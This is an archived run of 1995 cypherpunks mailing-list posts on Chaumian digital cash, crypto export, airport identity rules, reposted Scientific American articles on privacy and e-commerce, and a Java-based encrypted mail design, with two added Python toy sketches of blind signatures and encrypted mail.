    <a href="http://ugrad-www.cs.colorado.edu/~wilcoxb/Niche.html">

                          bryce@colorado.edu                   </a>



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMIauO/WZSllhfG25AQGXHwP+MEpnPvpj81fV66HEb8rozlMepnol3nj5
/d73LQpMxB7fLcMEDmISNQef/eU39zId8EZ1XCW7X3AujMBa4OjuBgl3+vdrAKo9
DIb6imXxc+E9dyHp0i9y/FZtzkOXKF6Abwy3SYMOSyaI2HsiCyUx2tEW/6OzDJTi
7YyOqR+FkNQ=
=cpK7
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 19 Oct 95 13:49:53 PDT
To: Bryce <wilcoxb@nag.cs.colorado.edu>
Subject: Re: digital cash and identity disclosure
Message-ID: <acac05c4410210047467@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:48 PM 10/19/95, Bryce wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
> Someone claiming to be the nym calling itself tcmay@got.net (Timothy C.
>May) wrote:
>>
>> As Hal notes, there are a lot of issues and attacks to consider. I'm sorry
>> that my brief section on Chaumian digital cash in the Cyphernomicon doesn't
>> adequately cover the issues (and as the debates here show, confusion still
>> reigns, and no doubt some of my points are misleading, wrong, or
>> incomplete).
>
>
>Boy, if I were you I would want to fix the inadequacy in C'nomicon in
>order to protect my positive rep...

To each their own. There's not enough time in my life to fix all the things
that are wrong, even if I knew what they all were.

My "positive rep," such as it is with certain people, does not depend on
producing flawless documents.

In fact, there are different kinds of people. Some favor "closely reasoned"
arguments (A implies B implies C implies D....), some favor "imaginative
leaps." Where I am depends on my mood.

-
>> it tends to make
>> identity-revealing attacks possible (such as the attack I alluded to, and
>> that Hal more completely describes),
>
>
>I hesitate to pipe up in such august company, but one of us is
>confused.  The attack that we have been discussing is possible because
>Chaumian Ecash allows the payer to identify the payee.  This would be
>true whether or not there were any protocols related to
>double-spending.  (i.e., because the payer knows the actual ID number
>of the bill, she can choose to relate it to the bank and then the bank
>can identify who turns in that bill.  Has nothing to do with
>double-spending.  If the protocol provided for re-blinding before
>depositing the bill then this would not be possible, I think, and
>would still have nothing to do with double-spending.)

Oh, but it does. Suppose Alice pays out the same piece of digital cash to
Bob, Charles, Ellen, Dave, etc. Each thinks they've been paid, each gets to
the bank, each finds the bank will not honor the digital cash, as Alice has
double spent.

(Note: Any schemes for "re-blinding" must still allow "uniqueness"...and
must still point back to Alice. Else the scheme/scam above will work.
Online clearing, in which only the _first_ to present a digital cash claim
gets paid, does not have this problem.)


>Announcement: I'm about to fade out from c'punks list for a while, so
>be sure and Cc: me if you want me to see your post.

I will this time, but people generally should not expect out-of-band cc:ings.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."
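
The two mechanisms argued over in this exchange, as an added sketch that is not from either poster: a payer who discloses a coin's serial number lets the bank name the depositor, and under online clearing only the first presenter of a double-spent coin is paid. It uses textbook RSA blind signatures with a constructed toy key; the names Bank, withdraw_coin and demo are assumptions.

```python
import hashlib
import secrets
from math import gcd

# Added illustration, not code from the thread. Constructed toy RSA key for the
# bank (two Mersenne primes; far too small for real use).
P, Q = 2**31 - 1, 2**61 - 1
N, E = P * Q, 65537
D = pow(E, -1, (P - 1) * (Q - 1))


def serial_hash(serial):
    """Map a coin serial number to the integer the bank signs."""
    return int.from_bytes(hashlib.sha256(serial).digest(), "big") % N


class Bank:
    """Hypothetical online-clearing mint: signs blinded values, pays each serial once."""

    def __init__(self):
        self.withdrawals = []   # (account, blinded value) as seen at withdrawal
        self.spent = {}         # serial -> account that deposited it

    def sign_blinded(self, account, blinded):
        self.withdrawals.append((account, blinded))
        return pow(blinded, D, N)

    def deposit(self, account, coin):
        serial, signature = coin
        if pow(signature, E, N) != serial_hash(serial):
            return False        # not a coin this bank signed
        if serial in self.spent:
            return False        # already cleared: later presenters get nothing
        self.spent[serial] = account
        return True

    def can_link_to_withdrawal(self, coin):
        """Can the bank match a deposited coin to anything it saw at withdrawal?"""
        serial, signature = coin
        seen = {blinded for _, blinded in self.withdrawals}
        return serial_hash(serial) in seen or signature in seen

    def who_deposited(self, serial):
        """What the bank can answer once the payer discloses a serial number."""
        return self.spent.get(serial)


def withdraw_coin(bank, account):
    """Payer side: pick a serial, blind its hash, have the bank sign, unblind."""
    serial = secrets.token_bytes(16)
    while True:
        r = secrets.randbelow(N - 2) + 2
        if gcd(r, N) == 1:
            break
    blinded = (serial_hash(serial) * pow(r, E, N)) % N
    signed_blinded = bank.sign_blinded(account, blinded)
    signature = (signed_blinded * pow(r, -1, N)) % N   # (h * r^E)^D / r = h^D
    return serial, signature


def demo():
    bank = Bank()
    coin = withdraw_coin(bank, "alice")
    # Alice hands the same coin to Bob and Charles; Bob reaches the bank first.
    bob_paid = bank.deposit("bob", coin)
    charles_paid = bank.deposit("charles", coin)
    return {
        "bob_paid": bob_paid,
        "charles_paid": charles_paid,
        "bank_links_withdrawal": bank.can_link_to_withdrawal(coin),
        "payee_named_by_serial": bank.who_deposited(coin[0]),
    }


if __name__ == "__main__":
    print(demo())
```

The bank's withdrawal log holds only the blinded value, so the deposit does not point back to Alice's account, while the serial she knows maps directly to the depositing account.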






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbaber@mi.leeds.ac.uk
Date: Thu, 19 Oct 95 06:10:34 PDT
To: cypherpunks@toad.com
Subject: Re:  crypto export from the UK
Message-ID: <4843.9510191407@misun2.mi.leeds.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



sameer <sameer@c2.org> wrote:
> 	Could people in the UK please tell me what the crypto export
> laws are like there? I know someone who wrote some really great crypto
> code in the UK but isn't willing to distribute it because of crypto
> export laws... I was under the impression that it was legal to export
> crypto from the UK.

I believe that the laws regarding the export of crypto from the UK are
very similar to the ITAR regs in the US. However our Government seems
to take the view that putting crypto software on the net is not
exporting it, the exporting is done whenever anyone from an export
restricted country downloads the software and is done by them rather
than by the person who made the software available.

Strong crypto is therefore openly available from a number of places in
this country, particularly sable.ox.ac.uk at the university of Oxford.

Of course IANAL and the government may change its mind about the
interpretation of these things but I would expect that your
acquaintance would be perfectly safe distributing his software via
sable (the ftp site (and its predecessor) have been distributing
crypto software for a number of years and I have not heard of any
problems).

Jon C. Baber
jbaber@mi.leeds.ac.uk
http://www.chem.surrey.ac.uk:80/~ch02jb




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 19 Oct 95 11:14:46 PDT
To: cypherpunks@toad.com
Subject: Re: Oh to be a mouse in the corner...
Message-ID: <199510191813.OAA13657@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


>PR   10/17 1720  ABA: TERRORISM EXPERTS TO SPEAK
>
>including former CIA Director William Colby, former FBI Director William
>Sessions, and Oklahoma Governor Frank Keating, whose state was the site of the
>worst domestic terrorist attack in U.S. history.

I thought the Civil War was the worst?

DCF






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 19 Oct 95 11:14:53 PDT
To: Brad Dolan <bdolan@use.usit.net>
Subject: Re: This PROMISes to be odius
Message-ID: <199510191813.OAA13667@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:20 PM 10/18/95 -0400, Brad Dolan wrote:
>
>PR   10/18 0809  ORACLE INTRODUCES SOFTWARE TOOL FOR LAW ENFORCEMENT 
>
>Tool Helps Federal, State, Municipal Agencies Stop the Criminal Element
>
>     Oracle SIUSS represents a major step forward in the collection, storage
>and analysis of case intelligence information for complex conspiracies, violent
>crimes such as rape and murder, drug trafficking, and other major cases.
>

I asked a friend of mine at Oracle if they are going to sell this to all
comers.  It would certainly be useful for tracking the activities of
government agents.

I'll see what he says.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 19 Oct 95 11:14:09 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: airport security
Message-ID: <199510191813.OAA13676@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:25 AM 10/19/95 -0400, Futplex wrote:

>It's bad enough that it is "illegal" (at least according to some recent ARC 
>flight coupons of mine) to sell or otherwise transfer your tickets to someone
>else. I'd love to see them try to justify crap like that.

Find a friendly travel agent.  Roll the ticket stock out of the printer
before your ticket is printed.  Cross out and initial the offending terms.
Pay for the ticket and have it printed.

We call it negotiation.

DCF

"But my name *is* Dr. Fred C. Schwartz.  I changed it just before I got
these tickets from Dr. Fred C. Schwartz.  I asked him to get them for me.  I
may change my name back to Duncan Frissell after the flight."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 19 Oct 95 11:14:26 PDT
To: "Bob Bruen, MIT Lab for Nuclear Science" <BRUEN@mitlns.mit.edu>
Subject: Re: airport security
Message-ID: <199510191813.OAA13695@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:16 AM 10/19/95 -0400, Bob Bruen, MIT Lab for Nuclear Science wrote:

>   Without actually agreeing with the FAA, the reason you can't have a name
>   other than your own on your ticket, as well as why you are required to
>   be in your assigned seat on take-off and landing is because if there is 
>   a plane crash, they need to be able to identify an otherwise difficult
>   to identify body. This does have some relevance to airport security if
>   a plane is blown up.

So, since planes were much more likely to crash in 1957 than they are now,
I suppose that you *really* must have had to prove your identity to get on a
plane in those days.

DCF

"Who wonders who's going to blow away the Gremlins eating the engines of
*today's* planes since the passengers have been disarmed."  Too much Outer
Limits/Twilight Zone/Science Fiction Theater as a kid.  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 19 Oct 95 06:35:39 PDT
To: cypherpunks@toad.com
Subject: SciAm Bye-Byes Privacy
Message-ID: <199510191329.OAA09581@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Scientific American, November, 1995

Rights of Privacy

Technology has its eyes on you


Privacy, as George Orwell pointed out, rests on some
level on a bargain between people and their machines.
Long before 1984, communications technology had the
potential to become surveillance technology. Now it is.
Not, as Orwell might have predicted, because Big Brother
wants to keep his subjects in thrall but simply because
most people want it to be. By giving up some protective
anonymity, people get safety and service. A majority seem
to think the bargain a very good one -- which is why
everybody should look very carefully at the fine print.

Somewhat ironically for the nation that gave birth to
Orwell, Britain is leading the way in creating the kind
of society that he taught the world to fear. More than
300 British city streets are wired for 24-hour
surveillance by closed-circuit television cameras. From
control rooms, police and private security officers scan
everything that moves, or doesn't, and dispatch police
officers to investigate anything suspicious.

More cities are getting wired all the time, often by
popular demand. Whatever qualms Britons have about
privacy, they are more concerned about crime. The cameras
do seem to reduce crime -- at least in the areas
underneath the cameras. Academics point out that
surveillance seems to have no impact whatsoever on the
overall level of crime, which is rising, but people just
don't seem to care about where the muggers go when they
leave their neighborhood -- particularly when their
neighborhood wasn't too good to begin with.

Safety is not the only reason to embrace surveillance. At
the Olivetti Research Laboratory in Cambridge, for
instance, Andy Hopper and his staff have for years worn
tiny badges that inform their computers where they are
each minute. The point is convenience. Computers
automatically bring to the screen the work of the person
sitting in front of them. Calls are forwarded to the
telephone nearest wherever they happen to be -- unless
the computers detect three or more badge wearers gathered
in the same office, in which case they are assumed to be
in a meeting, and calls are forwarded to their voice
mail.

To make life more convenient still, Hopper is trying even
cleverer technologies. Some chairs now contain compasses
that monitor whether they are pointed at a screen, and,
if not, the screen is dimmed to save power. Such devices,
Hopper reckons, are crucial to making computers
effortlessly easy to use. As he puts it, "You can't have
personalization without identification."

But the search for personalization in a high-tech world
may create an uncomfortable situation in the global
village. Villages are safe places but not very private
ones. Mrs. Grundy, peering from behind her lace curtains,
did stop housebreakers, but she also tried to halt many
other things of which she disapproved. There are signs
that Grundyism is returning to Britain. Many of the
crimes recorded by surveillance cameras are worryingly
petty. Arrests for urinating in public have soared. For
better and for worse, cameras that can see in the dark
now line romantic walks to the beaches in seaside towns.

In Britain, as elsewhere, technology and politicians are
about to deepen the privacy dilemma. Cameras are being
linked to smarter computers that can identify people.
Some drivers receive tickets without human intervention.
Video cameras check their speed and read their license
plates. Along with a ticket, the owner is sent a
photograph of the car and driver at the time the speeding
was clocked. A number of companies are touting technology
that can recognize faces by matching video images to
digitized photographs (from, say, drivers' licenses).

The British government, like many others, is also
discussing plans for a national identity card that would,
by giving everyone a number, make it easier to keep track
of personal data. The selling point is convenience. Much
of the work of filling out forms in bureaucratic Britain
is simply to give one branch of government information
that another part already has -- or to correct
information that bureaucrats have got wrong.

Convenient though it may be in theory, the combination of
national identity schemes and surveillance cameras
promises to give governments many of the powers of an
all-seeing God. And there are many reasons to worry that
mere humans would not be as merciful or as competent. Two
aspects of surveillance will prove crucial in determining
the practical terms of the new privacy bargain now being
struck: choice and reciprocity.

Unlike the subject of video surveillance, the wearer of
one of Olivetti's badges can remove the device and
disappear from the system. His electronic identity is
entirely a voluntary one: if he wishes to forward all the
telephone calls the old-fashioned way, by hand, there is
nothing to stop him. Surveillance becomes less intrusive
if it is optional. But choice cannot be a cure for all
the potential ills of surveillance. As electronic
personalization makes electronic identification more
important, that choice becomes harder to manage.

One problem is forgery. If electronic identities can be
taken on and off like sweaters, the risk that fraudsters
will be able to put on somebody else's identity rises.
Besides, as such identification becomes more important,
the sheer effort required to live anonymously will render
choice moot. Anonymity will simply become too much work.

Real village traditions offer hope for the lazy and the
identifiable. In village life, surveillance was
reciprocal: if Mrs. Grundy knew a lot about you, you also
knew a lot about her -- and you knew what she knew about
you. Technology should further extend this reciprocity.
The badges in the Olivetti lab provide a way of locating
any badge wearer. But they also allow badge wearers to
track anybody who is trying to locate them. There can
indeed be no personalization without identification, but
there is increasingly little excuse for identification
without notification. The same computers and networks
that send faces, names and numbers whizzing around the
world could also be required to send notification back to
each of those identified, each time they have been
spotted. Even as the world becomes more personalized and
less private, there is no reason for the electronic
global village to become less personable than a thatched
one, or less fair. 

Photo caption: Video cameras will scan the crowd at the
1996 Olympic Games in Atlanta. The security system can
transmit images for identification.

--John Browning

----------

The issue also has a brief report by Paul Wallich on
"Meta-Virus: Breaking the hardware species barrier,"
which reviews recently-publicized security flaws in the
Net, with quotes by William Cheswick of AT&T Bell Labs on
the issue and Hot Java.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Thu, 19 Oct 95 11:30:49 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: [NOISE] Re: Postscript in Netscape
In-Reply-To: <9510191718.AA19952@all.net>
Message-ID: <199510191830.OAA24317@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


AlephOne writes:
# I believe you have been told *SEVERAL* times you *WON'T* get an answer
# on this list, and to contact their PR department. 

Dr. Frederick B. Cohen writes:
> So the PR department defines security at Netscape?

I expect that the PR department defines Netscape's official position on the 
definition of security at Netscape. Are you not interested in Netscape's
official position?

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Thu, 19 Oct 95 14:39:30 PDT
To: cypherpunks@toad.com
Subject: Re: [NOISE] Re: Postscript in Netscape
Message-ID: <9510192135.AA14888@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


Please stop dinging Dr. Fred on the list, I know he's brought it on himself,
but it's painful to watch and pretty juvenile.  It's also bringing the signal
to noise ratio on this list way down.

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 19 Oct 95 07:00:36 PDT
To: cypherpunks@toad.com
Subject: SciAm's Crypto Stego Pushup
Message-ID: <199510191400.PAA10237@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Scientific American, November, 1995

Doing Business on the Net

By Anne Eisenberg 


Like the leaves of autumn, those resolutely noncommercial
days on the Internet when ads were anathema are dwindling
fast. Nowadays the Internet's World Wide Web has so much
commercial promise that it has spun off an association
called the HTML Writers' Guild (http://www.mindspring.com).
You can hire one of its members
literate in Hypertext Mark-up Language (HTML is the
language of the Web) to create dramatic "home pages,"
sites on the Web where a growing number of businesses
advertise their wares. "We're there for the same reason
we have banks in malls," one Citibank executive
explained. "It's where people congregate."

Web ads are quickly evolving into arresting combinations
of sound, text and vivid, point-and-click picture links
called image maps. Computer science students who were
once stern critics of business on the Net now eye the ads
appreciatively, so long as they are not "in your face" --
inserted where people have no choice but to look at them.
Besides, commercials may one day pay for Net services,
much as they now underwrite programs on radio and
television. And the ads are convenient: click on the
icon, read about the product and order, all in one step.

Many companies are poised to put not only advertisements
but entire catalogues on the Web as routinely as they now
list their services in the Yellow Pages. After all, if
e-mail could hatch a generation of letter writers by
eliminating the bother of envelopes and stamps, surely
commerce should blossom when paper catalogues fall, and
we all start buying straight from the screen.

For business to thrive, though, people will need a secure
way to pay and be paid on the leaky Net, where messages
containing credit-card numbers can be intercepted as they
travel from machine to machine. And all those prospective
shoppers, entrepreneurs and micromerchants will want not
only secure payment mechanisms but also a choice -- cash,
check or charge -- before they hit the convenient,
brightly colored order links. Inspired by a vision of
untold millions buying and selling on the Net, companies
and banks (among them Chase Manhattan, Citibank,
CyberCash, DigiCash, Mondex and Microsoft) have joined
what is being called the Gold Rush of 1995, as they race
to become the Great Central Biller in the Sky.

No victors have yet emerged, but early leaders are
probably going to provide security in the form of
public-key (PK) cryptography, ingenious algorithms that
use pairs of unique numerical "keys" for encoding and
decoding messages. If you use PK software for an online
shopping trip, you will have your own pair of keys, one
public and one as private as the identification number
you use to get cash from an automated teller machine.
When you order, your program will automatically encrypt
the information with your private key. When the company
uses your public key to decode the order, it will know
without question that the message was generated by you --
the match is the digital signature that authenticates the
transaction. Companies in turn will encrypt messages to
you with your public key; the messages will be secure,
for only you can decrypt and read them, using your
private key. Netscape and other new Web browsers --
software that lets you travel to linked Internet
resources without typing complicated addresses -- are
known as encrypting browsers; they are ready to help you
shop securely on the Net. Some will even come with
built-in PK signatures.

Whether the cryptographically cloaked digits of e-money
will bestow privacy in addition to security is another,
far more contentious matter. When people start using
e-wallets instead of cash to rent a video or lend a
friend $20, fertile new areas for infringing on privacy
will bloom. Electronic dossiers can be compiled by
automated systems that track spending habits. Many people
will not want the details of their daily lives collected
and stored in, say, consumer preference data banks,
joining the folders that already document their health
and credit ratings.

Only a few of the emerging electronic payment systems
address privacy issues. The untraceable digital cash
closest to hand is probably Chaumian cash, named in honor
of David Chaum, founder of DigiCash and of the
cryptographic protocols that underlie his anonymous
digital-money technology. Chaum's patented e-cash is an
adaptation of PK cryptography that includes one-way
privacy for the payer. The bank can verify that the money
is genuine but is blinded from identifying the source.
This means you will be able to prove you have made a
payment when you need to, but the bank cannot flick a
switch to retrieve the records of your travel and
entertainment preferences and add them to its data-mining
operations.

The terminology of electronic commerce reflects the clash
of cultures that has come about as the youthful language
of the Net meets the austere discourse of banking. The
jaunty "e-" prefix has attached itself firmly to Nettish
talk of the e-wallets and e-purses that we will soon be
using to make our e-payments. But bankers resist this
linguistic cheeriness. They substitute "digital" for
"electronic" whenever possible and never shorten it to
"d-" when they speak of the digital time stamps and
digital signatures they will soon offer us to
authenticate our digital payments. And cryptography
(known affectionately as crypto on the Net) is still a
four-syllable word at the bank, where it is against
nature for managers to be linguistically fond of any
action that commits them to untraceable communications
and exchanges.

We will know the new, hybrid field of electronic commerce
is truly on its way when banking ads on the Web offer
"strong crypto" and even, as a backup, steganography (the
science of hiding the existence of messages in, say,
microdots or sound files) for telephone chats with loan
officers. On the Net, of course, this service is already
known as stego.

-----

Anne Eisenberg (aeisenb@duke.poly.edu) conducts her
e-business at Polytechnic University in Brooklyn, N.Y.












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Thu, 19 Oct 95 15:02:37 PDT
To: sami.shaio@eng.sun.com
Subject: Java power
Message-ID: <199510192201.PAA14221@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   At the recent cypherpunks meeting about Java, I was fairly
skeptical of its power, especially its ability to do anything useful
towards interesting cypherpunk projects. I've been thinking about it a
bit more, and I believe I was overly pessimistic.

   My thinking problem was that I was envisioning Java as a
replacement for ordinary HTTP server interaction (such as CGI
scripts). I still believe that, absent HTTP server interaction, Java
applets are quite limited. However, now that I've started thinking
about systems that are built using a combination of Java and servers,
the universe has expanded a lot.

   I'm still unclear about the exact security policy implemented by
Java browsers, but this is my understanding:

   * No access to local files at all.

   * Can only access URLs on same server as applet came from.

   Actually, I'm pretty sure the latter is an oversimplification, that
the applet can contact any socket as long as it is on the same IP host
as the applet itself. However, since HTTP can do pretty much anything
any other socket can, the only difference that makes is performance.

   Here's the "big insight" I had: the server can make up _both_ of
these deficiencies, by acting as a file server and communications
proxy. Essentially what this architecture does is shift the security
burden from the client to the server. In this way, the applet can
become "net complete," rather than merely Turing complete.

   I see one big drawback to this approach. Setting up a server like
this is pretty expensive, and using it takes up precious resources.
Not everyone has access to a fully scriptable server, which will limit
a lot of people.

   One concern is the "parasitic" use of file system resources on the
server. However, there may be a certain amount of security through
obscurity that makes this ok. If all Java browsers enforce the policy
of only allowing connections to the home host of the applet, then you
won't be getting connections from other, parasitic applets. The
remaining danger is rogue Java browsers, and non-Java applications
that talk to the server, pretending to be Java applets. Some form of
authentication could be used to reduce the impact of these attacks.

   I do see this kind of architecture used to supply services at, say,
an organizational level. For example, the "scheduling" scenario could
be implemented quite handily, including authentication of access to
the schedules, and even distributed scheduling if the different
servers are talking to each other.

   Another scenario which works is email, even including transparent
encryption. This one is interesting to me, so I'll go into a little
more detail.

   In this scenario, the server acts as a file server for keyrings
(both public and secret) and mail spools. Here's a typical sequence of
events for me getting my mail and replying to one message:

1. I call up the JavaMail web page, which is just a wrapper for the
JavaMail applet.

2. The JavaMail applet starts with a forms-style login screen. I type
my username.

3. The applet asks the server for my mail spool (given the username
and perhaps also a password for authentication).

4. The applet displays my mail spool on the screen and lets me fiddle
with it, scrolling through it, reading messages, etc.

5. Let's say one of those messages is encrypted with my public key.
The applet, recognizing that fact, queries the server for my secret
key, encrypted of course (with a symmetric cypher).

6. I type my password to the applet, which lets it decrypt the secret
key.

7. Now that it has my secret key, the applet can RSA-decrypt the
encrypted mail and show it to me.

8. I want to reply to the message, so I hit 'r'. The applet gives me a
window for typing my reply. When I'm done, I click "send". The applet
queries the server for the recipient's public key.

9. When the applet gets the public key, it RSA-encrypts the message
and sends it to the server for delivery.

10. When the mail has been delivered, the server notifies the applet
of the fact.

   To me, this is an exciting scenario. Note that, as long as you
trust the browser, this lets you read your mail from anywhere.

   I have no idea whether this scheme is practical. One temporary
drawback is the speed of RSA operations. However, this will get fixed
when there is native code generation or a bignum library, whichever
comes first. Even before then, performance can still be good, using
two techniques. First, implement a cache of decrypted session keys
(also stored on the server in symmetrically encrypted form). Second,
don't display a new email message until it's been decrypted. That way,
the RSA operation affects only the latency of mail delivery, not the
bandwidth of reading through messages. Of course, these techniques
will also dramatically improve performance even for native code
crypto.

   I can see people setting up servers like this for themselves.
However, here's an idea on how to set these servers up "for profit."
In return for providing file system and mail communications services,
the server would expect clients to search keyspaces during idle
cycles. When Java goes native code, the computing power thus tapped
could be quite substantial.

   I'm interested to hear what people think about these proposals. Is
this something that cypherpunks should be doing full steam ahead?

Raph
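
The mail scenario in the message above, as an added sketch that is not Raph's code: the server stores only public keys, a password-wrapped secret key and encrypted spools, while wrapping, unwrapping and decryption happen on the client. MailServer and the function names are assumptions; the RSA key is a constructed toy and the HMAC-based keystream is a standard-library stand-in for a real symmetric cipher.

```python
import hashlib
import hmac
import secrets

# Added illustration with hypothetical names. Constructed toy RSA key for one
# user (two Mersenne primes; far too small for real use).
P, Q = 2**31 - 1, 2**61 - 1
N, E = P * Q, 65537
D = pow(E, -1, (P - 1) * (Q - 1))
KEY_BYTES = (N.bit_length() + 7) // 8


def keystream(key, nonce, length):
    """HMAC-SHA256 in counter mode: a stdlib stand-in for a real symmetric cipher."""
    blocks = (length + 31) // 32
    stream = b"".join(
        hmac.new(key, nonce + i.to_bytes(4, "big"), hashlib.sha256).digest()
        for i in range(blocks)
    )
    return stream[:length]


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def derive(password, salt):
    km = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000, dklen=64)
    return km[:32], km[32:]          # (encryption key, MAC key)


def wrap_secret_key(password, d):
    """Client side: encrypt-then-MAC the secret exponent before it goes to the server."""
    salt = secrets.token_bytes(16)
    enc_key, mac_key = derive(password, salt)
    body = xor(d.to_bytes(KEY_BYTES, "big"), keystream(enc_key, salt, KEY_BYTES))
    return salt + body + hmac.new(mac_key, salt + body, hashlib.sha256).digest()


def unwrap_secret_key(password, blob):
    """Client side: None means a wrong password or a blob modified on the server."""
    salt, body, tag = blob[:16], blob[16:-32], blob[-32:]
    enc_key, mac_key = derive(password, salt)
    expected = hmac.new(mac_key, salt + body, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        return None
    return int.from_bytes(xor(body, keystream(enc_key, salt, len(body))), "big")


class MailServer:
    """Keyring and spool file server; secret keys and mail are stored only encrypted."""

    def __init__(self):
        self.public_keys, self.wrapped_keys, self.spools = {}, {}, {}

    def enroll(self, user, public_key, wrapped_key):
        self.public_keys[user] = public_key
        self.wrapped_keys[user] = wrapped_key
        self.spools[user] = []

    def deliver(self, user, message):
        self.spools[user].append(message)
        return True                  # step 10: delivery notification


def send_mail(server, recipient, text):
    """Steps 8-9: fetch the public key, encrypt locally, hand over ciphertext only."""
    n, e = server.public_keys[recipient]
    session, nonce = secrets.token_bytes(8), secrets.token_bytes(8)  # toy sizes
    wrapped_session = pow(int.from_bytes(session, "big"), e, n)
    data = text.encode()
    body = xor(data, keystream(session, nonce, len(data)))
    return server.deliver(recipient, (wrapped_session, nonce, body))


def read_mail(server, user, password):
    """Steps 3-7: fetch spool and wrapped key, unwrap with the password, decrypt locally."""
    d = unwrap_secret_key(password, server.wrapped_keys[user])
    if d is None:
        return None
    n, _ = server.public_keys[user]
    texts = []
    for wrapped_session, nonce, body in server.spools[user]:
        session = pow(wrapped_session, d, n).to_bytes(8, "big")
        texts.append(xor(body, keystream(session, nonce, len(body))).decode())
    return texts


def demo():
    server = MailServer()            # constructed user name and password below
    server.enroll("raph", (N, E), wrap_secret_key("correct horse", D))
    delivered = send_mail(server, "raph", "meet at the usual place")
    tampered = bytearray(server.wrapped_keys["raph"])
    tampered[20] ^= 1                # flip one bit of the stored key blob
    return {
        "delivered": delivered,
        "read": read_mail(server, "raph", "correct horse"),
        "wrong_password": read_mail(server, "raph", "guess"),
        "server_sees_plaintext": b"usual place" in server.spools["raph"][0][2],
        "tampered_key_rejected": unwrap_secret_key("correct horse", bytes(tampered)) is None,
    }
```

The password and the unwrapped exponent exist only on the client, which is why the scenario depends on trusting the browser, as the message says.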




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallyn@cs.hope.edu (Kenshiro)
Date: Thu, 19 Oct 95 12:44:49 PDT
To: cypherpunks@toad.com
Subject: textbooks
Message-ID: <9510191944.AA09970@samwise.cs.hope.edu>
MIME-Version: 1.0
Content-Type: application/pgp

PGP message


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 19 Oct 95 13:07:02 PDT
To: cypherpunks@toad.com
Subject: Re: SciAm Bye-Byes Privacy
Message-ID: <199510192003.QAA01607@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


>Scientific American, November, 1995
>
>Rights of Privacy
>
>Technology has its eyes on you
>
>But the search for personalization in a high-tech world
>may create an uncomfortable situation in the global
>village. Villages are safe places but not very private
>ones. Mrs. Grundy, peering from behind her lace curtains,
>did stop housebreakers, but she also tried to halt many
>other things of which she disapproved. There are signs
>that Grundyism is returning to Britain. 

For those who have neglected their education:

1798

Theater --- "Speed the Plough" by English playwright Thomas Morton, 34. "Be
quiet, wull ye [says farmer Ashfield]. Always ding, dinging Dame Grundy into
my ears-What will Mrs. Grundy say? What will Mrs. Grundy think?" 

DCF







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael H. Warfield <mhw@wittsend.com>
Date: Thu, 19 Oct 95 13:07:42 PDT
To: cypherpunks@toad.com
Subject: Re: Postscript and 50 ways [MAJOR NOISE] [long]
In-Reply-To: <9510191718.AA19952@all.net>
Message-ID: <m0t61If-0000oYC@wittsend.com>
MIME-Version: 1.0
Content-Type: text/plain


Man oh man oh man...

	<Here> - <We> - <Go> - <A!Gain>...

	Rather than plague everyone with separate harangues for each of
numerous messages about two separate obnoxious nuisance threads going
on here - I've combined several messages together.  I think I have
